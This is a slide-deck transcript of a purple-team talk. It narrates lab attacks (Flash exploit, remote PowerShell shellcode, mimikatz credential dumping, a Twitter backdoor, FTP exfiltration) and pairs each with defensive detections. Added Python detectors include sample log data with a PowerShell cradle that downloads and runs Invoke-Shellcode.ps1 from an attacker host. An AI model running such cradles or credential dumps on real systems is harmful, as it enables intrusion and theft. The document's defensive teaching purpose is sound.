  • 2. Quick who are we Haydn Johnson @haydnjohnson OSCP Offensive/Attack Interest Enjoys presenting Laura @raffertylaura MSc Computer Science (Security/Privacy) Interested in both sides of security Loooooves presenting
  • 3. Contents 1. Basic Term Definition 2. Introduction to Red, Blue and Purple 3. Run through of an Attack ○ Gaining Access ○ Lateral Movement ○ Domain Admin ○ Maintaining Access ○ Data Exfiltration 4. For each attack: ○ Attacking View ○ Defender's View ○ Possible Purple Team exercises
  • 4. Definitions Exploit - The thing used to gain unauthorized access to a system Payload - What is done after the access is gained (shell, command) Metasploit - An open source exploit framework, modular Meterpreter - an advanced, extensible payload that uses in-memory DLL injection Shell - Gaining Terminal/CMD access remotely https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ http://www.metasploit.com/
  • 5. Red Team - Penetration | Offensive ● Scans ● Exploits ● Logic abuse ● Access to things they shouldn’t
  • 6. Blue Team - Block, Prevent, Detect | Defensive ● Logs ● Emails ● Events ● Triggers ● Networking ● More Logs
  • 7. Red Team - Goals ● Model recent threats and trends ● Longer term ● Highlight gaps in security controls, detection etc. ● Escape and evade for persistence
  • 8. Blue Team - Goals ● Detect attack ● Respond and recover ● Produce actionable intelligence ● Identify gaps and investment needs
  • 9. Purple Team - Offensive & Defensive Working together to achieve the ultimate goal of making the organization more secure ● Exposes blue team to different threats & attacker mindset ● Tests incident detection and response ● Allows red team to sharpen skills ● Policy and procedures tested ● Tuning of controls
  • 10. Purple Team - Offensive & Defensive Different types of Purple Teaming ● Red Team sitting with Network Defense team ● Adversary Simulation ● Traffic Generation ● cobaltstrike.com ● Wargaming Requires total picture involving all areas of the organization
  • 11. Purple Team - The difference ● Using security posture and weaknesses to find what is most valuable ● Goal oriented ● Review attack ● Test how teams use services and how they are managed
  • 12. Purple Team - The difference ● Time to Domain Admin ● Time to Data/Objective ● Time to Respond ● Time to Recover ● Identify where there needs to be more investment ● Measure impact Done right, the blue team should come out with better monitoring and response plans.
  • 13. Purple Team - The difference ● Set up a fake scenario - Assume Breach ● How will the attacker gain access? ● Why have they attacked, what do they want? ● How did they move through the network? ● If they exfiltrated data, how? Do not turn off servers or block IP addresses; make it realistic
  • 14. Purple Team - Exercise “In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.” - Raphael Mudge http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
  • 15. Purple Team - DEMO (step by step) Our exercise
  • 16. Purple Team - Demo Architecture Domain: corp.test.com
  • 17. Tools Used Red Team: ● Kali Linux ● Metasploit ● Meterpreter ● PowerSploit ● Twittor Blue Team: ● Wireshark ● Windows Event Logs
  • 18. Setting up Windows GP
  • 19. Gaining Access Hacking Team Flash Exploit
  • 20. Flash Exploits ● Flash plugins are vulnerable ○ You can embed JavaScript/binary within a Flash file ○ ActionScript to define events to redirect to landing page ● Most exploit kit landing pages redirect to pages containing Flash exploits ○ Angler ○ Nuclear ○ Fiesta ● Installed by default in the browser ● New vulnerabilities are identified on almost a weekly basis
  • 21. Gaining Access Flash 18.0.0.194
  • 22. A: Flash Exploit from SecurityFocus Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
  • 23. A: Start Flash Exploit from Kali
  • 24. A: Start Flash Exploit from Kali
  • 25. A: Redirect Victim Client1 user navigates to a malicious site which redirects to the exploit
  • 26. A: Client1 is exploited
  • 27. A: A session is now established with Client1 We can now run Meterpreter
  • 28. B: Wireshark: Landing Page and Redirect
  • 30. B: What can you take away Security Onion: implement it, it is free Has Snort rules for Flash exploits (need to install) Confirm whether Flash is needed for business reasons Keep Flash updated 2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules) 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules) https://www.security-database.com/detail.php?alert=CVE-2015-5119 https://security-onion-solutions.github.io/security-onion/
  • 31. Purple Team - Exercise ● Blue team understands how attackers can gain initial access ● Flash exploits - ongoing issue ● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective ● Red team sees how attacks are visible to the blue team and thinks of ways to make them stealthier
  • 33. Privilege Escalation ● We are skipping privilege escalation from Domain User to Local Admin
  • 35. A: PowerSploit Available on GitHub, open source https://github.com/mattifestation/PowerSploit
  • 36. A: PowerSploit More than one script! PowerShell modules
  • 37. PowerView Part of PowerShell Empire Very advanced https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  • 38. A: Lateral Movement The same local Administrator account passwords on multiple computers, by Sean Metcalf https://adsecurity.org/?p=1684
  • 39. Same Passwords for All Local Admins
  • 41. A: Lateral Movement PowerSploit remote PowerShell using Invoke-Shellcode.ps1
  • 42. A: Base64 Encoding Payload Removes issues with whitespace The Hacker Playbook 1 (now 2) http://thehackerplaybook.com/dashboard/
  • 43. A: Hosting PowerSploit Invoke-Shellcode.ps1 PowerSploit code hosted on local Kali machine
  • 44. A: Invoke-WmiMethod Use PowerShell to connect remotely, create a new process and launch the IEX cradle. Calls Windows Management Instrumentation (WMI) methods. The Win32_Process WMI class allows creation of a process.
  • 45. A: Execute Remote Command Execute command from Client1 to tell Client2 to download and execute shellcode
  • 46. A: Client1 gives same password Same password across multiple clients
  • 48. B: Wireshark traffic TCP handshake Bind requests
  • 49. B: Client1 requests remote instance on Client2
  • 50. B: Client2 eventually asks where Kali is
  • 51. B: Client2 downloads Invoke-Shellcode.ps1
  • 52. B: Client1 logs into Client2
  • 53. B: PowerShell process created
  • 54. B: PowerShell connects to Kali Client2 reaches out to Kali on port 80
  • 55. B: What can you take away Event correlation - based on event ID, source and destination for remote connections Implement alerting based on Security Events together; a SIEM can/SHOULD do this Use LOG-MD - really great logging tool, especially for PowerShell http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk http://malwarearchaeology.squarespace.com/log-md/
  • 56. Purple Team - Benefits ● Identify ways to move around the network ● Identify and confirm defensive controls in place ● Identify what worked, what did not ● Implement changes ● Justification for resources
  • 57. Privilege Escalation Local Admin to Domain Admin
  • 58. A: Local Admin to Domain Admin ● Why escalate privileges from Local Admin to Domain Admin? ● Domain admin - control over Active Directory! ● Access IT resources ● Create accounts ● Propagate malware
  • 59. A: Local Admin to Domain Admin
  • 60. A: Local Admin to Domain Admin From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
  • 61. A: Local Admin to Domain Admin Use psexec to run mimikatz.exe on Client2
  • 62. A: Local Admin to Domain Admin Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
  • 64. B: Event Logs Client1 logs into Client2 as local admin
  • 65. B: Event Logs Client1 runs mimikatz on Client2
  • 66. B: Event Logs Sensitive privilege use from Client1 to Client2
  • 67. B: What can you take away ● Prevention: ○ Access control for shared drive ○ Limit access to psexec and monitor use ○ Active Directory best practices ● Detection: ○ IDS signatures ○ SIEM use case - event correlation between system logs and network proxy logs ○ For lateral movement: enable file level auditing ○ Canary accounts
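Slides 55 and 67 both ask the blue team to correlate events by ID, source and destination rather than alert on any one of them. The block below is an added example written for this page, not the presenters' code and not LOG-MD or any SIEM's logic. It replays the two attack paths from the demo against constructed Windows event records: a network logon (event 4624, logon type 3) from Client1 followed on the same host by a PowerShell process (4688) whose -EncodedCommand blob decodes to an IEX download cradle, and a network logon followed by ADMIN$ share access (5140) and a new service (7045), the footprint a psexec-style run of mimikatz leaves. It also flags any logon with a canary account. The host and account names, the CORP domain, the canary account, the 10-minute window, the sample command lines and the service name are all assumptions for the example.

```python
import base64
import re
from datetime import datetime, timedelta

# Strings a PowerShell download cradle leaves in a command line (the IEX cradle of slide 44).
CRADLE = re.compile(r"IEX|Invoke-Expression|DownloadString|Net\.WebClient", re.I)
# -enc / -EncodedCommand followed by the base64 blob (the whitespace-free payload of slide 42).
ENC_FLAG = re.compile(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CANARY_ACCOUNTS = {"CORP\\canary_admin"}   # assumption: a decoy account nobody should ever use
WINDOW = timedelta(minutes=10)              # assumption: how long after a logon follow-on activity counts


def enc(script):
    """Encode a script the way PowerShell's -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events shaped like Windows Security/System log fields (not real logs).
# 4624 = logon (LogonType 3 = network), 4688 = process created,
# 5140 = network share accessed, 7045 = new service installed (System log).
EVENTS = [
    # Client1 (10.0.0.11) logs on to Client2 over the network, then an encoded cradle runs (slides 52-54)
    {"time": "2016-03-01 14:02:10", "id": 4624, "host": "CLIENT2", "user": "CORP\\localadmin",
     "logon_type": 3, "src_ip": "10.0.0.11"},
    {"time": "2016-03-01 14:02:14", "id": 4688, "host": "CLIENT2", "user": "CORP\\localadmin",
     "process": "powershell.exe", "cmdline": "powershell.exe -NoP -W Hidden -enc "
     + enc("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.99/Invoke-Shellcode.ps1')")},
    # Client1 maps ADMIN$ on Client2 and psexec installs its service (slides 60-66)
    {"time": "2016-03-01 14:20:01", "id": 4624, "host": "CLIENT2", "user": "CORP\\localadmin",
     "logon_type": 3, "src_ip": "10.0.0.11"},
    {"time": "2016-03-01 14:20:03", "id": 5140, "host": "CLIENT2", "user": "CORP\\localadmin",
     "share": "\\\\*\\ADMIN$", "src_ip": "10.0.0.11"},
    {"time": "2016-03-01 14:20:09", "id": 7045, "host": "CLIENT2", "user": "CORP\\localadmin",
     "service": "PSEXESVC"},
    # Benign: an interactive logon and a local PowerShell session on Client1 (must not alert)
    {"time": "2016-03-01 15:00:00", "id": 4624, "host": "CLIENT1", "user": "CORP\\alice",
     "logon_type": 2, "src_ip": "-"},
    {"time": "2016-03-01 15:00:30", "id": 4688, "host": "CLIENT1", "user": "CORP\\alice",
     "process": "powershell.exe", "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    # The decoy account is used from somewhere on the network
    {"time": "2016-03-01 15:10:00", "id": 4624, "host": "DC1", "user": "CORP\\canary_admin",
     "logon_type": 3, "src_ip": "10.0.0.12"},
]


def expand_cmdline(cmdline):
    """Append the decoded -EncodedCommand blob (if any) so cradle patterns inside it can be matched."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:            # not valid base64: keep the raw command line
        return cmdline
    return cmdline + " " + decoded


def _ts(ev):
    return datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")


def correlate(events, window=WINDOW):
    """Pair each network logon with suspicious follow-on activity on the same host within `window`."""
    events = sorted(events, key=_ts)
    alerts = []
    for ev in events:
        if ev["id"] in (4624, 4625) and ev["user"] in CANARY_ACCOUNTS:
            alerts.append({"rule": "canary-account-use", "host": ev["host"],
                           "src_ip": ev["src_ip"], "user": ev["user"]})
        if ev["id"] != 4624 or ev.get("logon_type") != 3:
            continue
        t0 = _ts(ev)
        follow = [e for e in events if e is not ev and e["host"] == ev["host"]
                  and t0 <= _ts(e) <= t0 + window]
        base = {"host": ev["host"], "src_ip": ev["src_ip"], "user": ev["user"], "logon_time": ev["time"]}
        for e in follow:
            if (e["id"] == 4688 and e["process"].lower() == "powershell.exe"
                    and CRADLE.search(expand_cmdline(e["cmdline"]))):
                alerts.append(dict(base, rule="remote-powershell-cradle", cmdline=e["cmdline"]))
        admin_share = any(e["id"] == 5140 and e["share"].upper().endswith("ADMIN$") for e in follow)
        services = [e["service"] for e in follow if e["id"] == 7045]
        if admin_share and services:
            alerts.append(dict(base, rule="psexec-style-remote-service", services=services))
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a["rule"], "on", a["host"], "from", a["src_ip"])
```

The point of the join is in the last loop: a network logon on its own, a PowerShell process on its own, or a share access on its own is normal on a workstation, and it is the sequence within a short window on one host that separates the demo's traffic from the benign CLIENT1 events, which produce nothing. Decoding the -EncodedCommand blob before matching is what keeps the base64 trick of slide 42 from hiding the cradle.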
  • 68. Purple Team - Benefits ● Blue team observes vulnerabilities/threats which may not have been considered ○ Learns how an attacker could escalate privileges from local admin to domain admin ● Red team observes the footprint left behind from this attack and possibly how to minimize it ○ Can identify potential weaknesses in blue team monitoring/response processes ○ Provide more thorough recommendations
  • 70. A: Twittor ● Easy to install ● Easy to use ● Easy to add shellcode https://github.com/PaulSec/twittor
  • 71. A: Twittor - insides Simple subprocess execution Stored as base64 encoded message
  • 72. A: PyInstaller On GitHub Turns a Python file into an EXE https://github.com/pyinstaller/pyinstaller
  • 73. A: PyInstaller Python file becomes executable
  • 74. Twittor: Backdoor Using Twitter
  • 75. A: Twittor Python file used as C2 server Python file used as backdoor EXE - PyInstaller
  • 76. A: Twittor - Retrieving command Send command to execute Retrieve command
  • 77. B: Twittor - Network Traffic Reaching out to API Normal user traffic??
  • 78. B: Twittor - Client system Backdoor as Python executable compiled with --no-console flag to hide output
  • 79. B: Traffic from Client Reaches out to Twitter Src and destination are internal IPs, sends to API
  • 80. B: What can you take away Check if there are any remote connections after hours; is it against policy? Again, correlate logs with known C2 addresses See if AV picks it up
  • 81. Purple Team - Benefits Test if a C2 can reach out to Twitter. Social media may be blocked via the browser, but some sites can still be accessed via API etc. If it is not blocked, why not? Can your blue team help to stop this and others?
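Slide 77's question ("Normal user traffic??") is the whole problem with a Twitter-based C2: the destination is one that people legitimately use. The block below is an added example, not the presenters' code or anything from Twittor, that runs slide 80's two checks (after-hours connections, known C2 addresses) over constructed proxy log lines and adds a third that the slides do not state but that follows from slide 76: a backdoor retrieving commands polls the API on a timer, so the gaps between its requests are far more regular than a person's. The log format, the business hours, the client addresses, the placeholder Twitter and C2 addresses and the jitter threshold are all assumptions for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime, time

BUSINESS_HOURS = (time(8, 0), time(18, 0))   # assumption: policy hours for user web traffic
KNOWN_C2 = {"203.0.113.7"}                    # placeholder in documentation address space, not a real indicator
MIN_REQUESTS = 6                              # assumption: fewer requests give no usable interval statistics
MAX_JITTER = 0.10                             # assumption: stdev/mean below this looks scripted, not human


def _lines(client, host, dst_ip, times):
    """Build constructed proxy lines: "<iso time> <client ip> <dest host> <dest ip> <method> <path>"."""
    return [f"{t} {client} {host} {dst_ip} GET /1.1/statuses/home_timeline.json" for t in times]


# Constructed proxy log. The Twitter and C2 addresses are placeholders, not real infrastructure.
PROXY_LOG = (
    # Client2 polling the Twitter API every ~60 s at 2 a.m.: the backdoor retrieving commands
    _lines("10.0.0.12", "api.twitter.com", "198.51.100.20", [
        "2016-03-01T02:00:00", "2016-03-01T02:01:01", "2016-03-01T02:02:00", "2016-03-01T02:03:02",
        "2016-03-01T02:03:59", "2016-03-01T02:05:00", "2016-03-01T02:06:01"])
    # A person on Client1 using the same API during the day, at human-irregular gaps
    + _lines("10.0.0.11", "api.twitter.com", "198.51.100.20", [
        "2016-03-01T09:12:03", "2016-03-01T09:12:40", "2016-03-01T09:31:15", "2016-03-01T10:05:50",
        "2016-03-01T10:06:02", "2016-03-01T12:45:09", "2016-03-01T13:20:00"])
    # One request to an address on the known-C2 list
    + ["2016-03-01T11:30:00 10.0.0.13 cdn.example.test 203.0.113.7 POST /update"]
)


def parse_line(line):
    ts, src, host, dst_ip, method, path = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "host": host,
            "dst_ip": dst_ip, "method": method, "path": path}


def is_after_hours(ts):
    start, end = BUSINESS_HOURS
    return not (start <= ts.time() < end)


def interval_stats(times):
    """Mean gap in seconds between consecutive timestamps and its relative jitter (stdev / mean)."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    mean = statistics.mean(gaps)
    jitter = statistics.pstdev(gaps) / mean if mean else float("inf")
    return mean, jitter


def analyse(lines):
    """Group requests by (client, destination) and apply the three checks to each group."""
    by_pair = defaultdict(list)
    for rec in map(parse_line, lines):
        by_pair[(rec["src"], rec["host"])].append(rec)
    findings = []
    for (src, host), recs in by_pair.items():
        dst_ip = recs[0]["dst_ip"]
        if dst_ip in KNOWN_C2:
            findings.append({"rule": "known-c2-address", "src": src, "host": host, "dst_ip": dst_ip})
        after = sum(is_after_hours(r["ts"]) for r in recs)
        if after:
            findings.append({"rule": "after-hours-connection", "src": src, "host": host, "count": after})
        if len(recs) >= MIN_REQUESTS:
            mean, jitter = interval_stats([r["ts"] for r in recs])
            if jitter < MAX_JITTER:
                findings.append({"rule": "regular-beacon", "src": src, "host": host,
                                 "mean_interval_s": round(mean), "jitter": round(jitter, 3)})
    return findings


if __name__ == "__main__":
    for f in analyse(PROXY_LOG):
        print(f)
```

The known-C2 match is the cheapest check and the weakest, because a C2 hosted on a public API has no address of its own to list; the after-hours and interval checks are what separate Client2's polling from Client1's browsing to the very same host. A real backdoor may add random sleep to its poll loop, which is why the jitter threshold is a tunable and should be set from the organisation's own baseline rather than copied.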
  • 82. Data Exfiltration Clear Text FTP
  • 83. A: Data Exfiltration Through Clear Text FTP
  • 84. A: FTP Extraction Finding data to extract
  • 85. A: Finding data Important data identified
  • 88. B: Meterpreter connection DLL injection Lots of chatter
  • 89. B: FTP connection Clear text
  • 91. B: What can you take away? Disable FTP - there should not really be a business need for it If there is a business need, whitelist those IP addresses | Create a group of users specifically for FTP
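Slide 89 shows the FTP control channel in Wireshark with everything readable; slide 91's mitigations are an allow-list of FTP servers and a dedicated FTP user group. The block below is an added example, not the presenters' code, that parses a constructed "Follow TCP Stream" style capture of the upload to the Kali box and turns those two mitigations into checks, alongside extracting what the capture gives away for free (the account, the fact that a password crossed the wire, the data-channel port from the 227 reply, and the file names sent with STOR). The session text, the file name, the server addresses and the group membership are all assumptions for the example.

```python
import re

FTP_SERVER_ALLOWLIST = {"10.0.0.50"}   # assumption: the one sanctioned FTP server
FTP_GROUP = {"ftp_batch"}              # assumption: members of the dedicated FTP user group

# Constructed control-channel text (port 21) for the upload from Client1 to Kali at 10.0.0.99.
# Every line, the password included, crosses the wire exactly like this.
SESSION = """\
220 (vsFTPd 3.0.2)
USER localadmin
331 Please specify the password.
PASS Winter2016!
230 Login successful.
TYPE I
200 Switching to Binary mode.
PASV
227 Entering Passive Mode (10,0,0,99,195,149).
STOR Customer_List.xlsx
150 Ok to send data.
226 Transfer complete.
QUIT
221 Goodbye.
"""

PASV_REPLY = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def parse_session(text):
    """Split the stream into (verb, argument) client commands and (code, text) server replies."""
    commands, replies = [], []
    for line in text.splitlines():
        if re.match(r"\d{3}[ -]", line):
            replies.append((int(line[:3]), line[4:]))
        elif line.strip():
            verb, _, arg = line.strip().partition(" ")
            commands.append((verb.upper(), arg))
    return commands, replies


def data_port(replies):
    """Port the server opened for the data channel, from the 227 reply: p1 * 256 + p2."""
    for code, text in replies:
        m = PASV_REPLY.search(text) if code == 227 else None
        if m:
            return int(m.group(5)) * 256 + int(m.group(6))
    return None


def summarise(text, server_ip):
    """Extract what the clear-text session reveals and check it against the two mitigations."""
    cmds, replies = parse_session(text)
    user = next((a for v, a in cmds if v == "USER"), None)
    uploads = [a for v, a in cmds if v in ("STOR", "APPE")]
    downloads = [a for v, a in cmds if v == "RETR"]
    findings = []
    if any(v == "PASS" for v, _ in cmds):
        findings.append(f"credentials sent in clear text for user {user!r}")
    if server_ip not in FTP_SERVER_ALLOWLIST:
        findings.append(f"FTP server {server_ip} is not on the allow-list")
    if user is not None and user not in FTP_GROUP:
        findings.append(f"account {user!r} is not in the dedicated FTP group")
    if uploads and server_ip not in FTP_SERVER_ALLOWLIST:
        findings.append(f"possible exfiltration: {', '.join(uploads)} uploaded to {server_ip}")
    return {"user": user, "logged_in": any(code == 230 for code, _ in replies),
            "uploads": uploads, "downloads": downloads, "data_port": data_port(replies),
            "findings": findings}


if __name__ == "__main__":
    for line in summarise(SESSION, "10.0.0.99")["findings"]:
        print("-", line)
```

Note that the first finding fires even for a sanctioned server and a group member: the allow-list and the group limit who can use FTP and where, but nothing short of disabling it (the slide's first recommendation) stops the credentials and file names from being readable on the wire.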
  • 92. Purple Team - Exercise Clear text Will any alarms trigger? Understand potential holes in alerting Measure time to detect and respond
  • 93. Conclusion Purple Teaming is Good
  • 94. Purple Team - Reiteration Provides more value than a penetration test Should be implemented on a regular schedule Helps train security personnel Helps make sure your boxes are tuned
  • 95. Limitations and Future Work ● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort) ● Could be extended for enterprise security tools such as SIEM/IDS ● PowerShell/WMI for blue team ● More advanced attacks, persistence using PowerShell Empire
  • 97. References are in following slides
  • 98. Microsoft - 8 minute Video https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
  • 99. Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013 http://www.slideshare.net/beltface/hybrid-talk
  • 100. A: Downloads PowerShell file Client2 reaches out to Kali machine